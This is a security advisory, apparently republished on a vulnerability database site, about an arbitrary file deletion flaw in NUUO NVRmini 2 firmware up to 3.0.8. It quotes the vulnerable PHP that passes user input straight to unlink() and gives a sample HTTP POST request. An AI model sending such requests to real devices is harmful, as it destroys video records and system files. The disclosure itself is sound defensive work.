NUUO 3.0.8 Arbitrary File Deletion

2016.08.07
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

i>>? NUUO Arbitrary File Deletion Vulnerability Vendor: NUUO Inc. Product web page: http://www.nuuo.com Affected version: <=3.0.8 Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS functionality. Setup is simple and easy, with automatic port forwarding settings built in. NVRmini 2 supports POS integration, making this the perfect solution for small retail chain stores. NVRmini 2 also comes full equipped as a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping and RAID functions for data protection. Choose NVR and know that your valuable video data is safe, always. Desc: Input passed to the 'filename' parameter in 'deletefile.php' is not properly sanitised before being used to delete files. This can be exploited to delete files with the permissions of the web server using their absolute path or via directory traversal sequences passed within the affected POST/GET parameter. ================================================================== /deletefile.php: ---------------- 1: <?php 2: $filename=$_POST['filename']; 3: unlink($filename); 4: if (file_exists($filename)) 5: echo "fail"; 6: else echo "true"; 7: ?> ================================================================== Tested on: GNU/Linux 3.0.8 (armv7l) GNU/Linux 2.6.31.8 (armv5tel) lighttpd/1.4.28 PHP/5.5.3 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5353 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php 14.01.2016 -- POST /deletefile.php HTTP/1.1 Host: 10.0.0.17 Content-Length: x Origin: http://10.0.0.17 X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Connection: close filename=He_molested_murdered_and_mutilated_her.mp4

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5353.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top